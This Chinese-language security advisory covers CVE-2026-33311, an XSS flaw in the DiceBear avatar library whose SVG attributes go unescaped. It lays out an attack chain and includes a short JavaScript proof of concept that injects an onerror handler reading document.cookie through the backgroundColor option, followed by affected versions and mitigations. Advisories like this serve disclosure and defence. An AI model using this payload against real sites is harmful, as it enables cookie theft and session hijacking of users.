CVE-2026-33311 CVSS 4.7 中危

CVE-2026-33311 DiceBear跨站脚本漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33311

漏洞类型

XSS

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

DiceBear

漏洞概述

DiceBear是一个用于设计师和开发者的头像库。在5.0.0版本及之后，且在5.4.4、6.1.4、7.1.4、8.0.3和9.4.1版本之前，从用户提供的选项（如backgroundColor、fontFamily、textColor）派生的SVG属性值在插入到SVG输出之前未进行XML转义。当应用程序将不受信任的输入传递给createAvatar()并以内联方式或使用Content-Type: image/svg+xml提供生成的SVG时，这可能导致跨站脚本（XSS）。攻击者可利用此漏洞在受害者浏览器中执行恶意脚本。

技术细节

该漏洞的核心原理在于SVG注入引发的跨站脚本攻击（XSS）。DiceBear库在处理SVG生成请求时，未对用户可控的选项参数（如backgroundColor、fontFamily、textColor）进行严格的XML实体编码，直接将其值拼接到SVG文档的属性节点中。攻击者可以利用这一缺陷，精心构造包含恶意JavaScript代码的Payload。例如，通过在backgroundColor参数中注入双引号来闭合原有属性，并插入如onerror或onload等事件处理器，从而将恶意代码植入SVG结构。当受害者的浏览器请求并解析该生成的SVG文件（特别是当服务器设置了Content-Type为image/svg+xml时），浏览器会将其作为文档对象解析并执行其中的脚本。由于CVSS向量中包含S:C（范围改变），该XSS攻击不仅限于当前上下文，还可能波及同源下的其他页面或会话，造成数据泄露或会话劫持。

攻击链分析

STEP 1

侦察

攻击者识别目标网站使用DiceBear库生成头像，且版本在受影响范围内（5.0.0至5.4.4等）。

STEP 2

构造载荷

攻击者构造包含JavaScript代码的恶意字符串，利用XML属性未转义的特性，例如将backgroundColor值设为 `red" onerror="alert(1)`。

STEP 3

注入

攻击者通过HTTP请求将包含恶意payload的数据发送给目标应用程序，应用程序将其作为参数传递给createAvatar()函数。

STEP 4

渲染

应用程序生成SVG头像，并以Content-Type: image/svg+xml或内联方式发送给用户的浏览器。

STEP 5

执行

用户浏览器解析SVG内容，触发恶意脚本执行，导致Cookie窃取或会话劫持等后果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC Concept for CVE-2026-33311
// Target: DiceBear < 5.4.4, 6.1.4, etc.
// Description: Injecting malicious JS via backgroundColor attribute

const { createAvatar } = require('@dicebear/core');
const { avataaars } = require('@dicebear/collection');

// Malicious payload containing XSS payload
// The closing quote (") closes the SVG attribute, and onerror injects the script
const payload = 'red" onerror="alert(document.cookie)';

try {
  const avatar = createAvatar(avataaars, {
    backgroundColor: payload // Untrusted user input used directly
  });

  const svg = avatar.toString();
  console.log(svg);
  // The output SVG will look like:
  // <svg ...> <path fill="red" onerror="alert(document.cookie)" ... /> </svg>
  // When served with Content-Type: image/svg+xml, the alert executes.
} catch (e) {
  console.error(e);
}

影响范围

5.0.0 <= version < 5.4.4

6.0.0 <= version < 6.1.4

7.0.0 <= version < 7.1.4

8.0.0 <= version < 8.0.3

9.0.0 <= version < 9.4.1

防御指南

临时缓解措施

如果无法立即升级，应用程序应在调用DiceBear库之前，对所有用户输入进行严格的验证和过滤，确保符合预期的格式（例如颜色值只包含合法的十六进制代码），防止注入恶意字符。此外，避免直接以image/svg+xml内容类型提供不受信任的SVG，或确保在安全隔离的环境中渲染。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表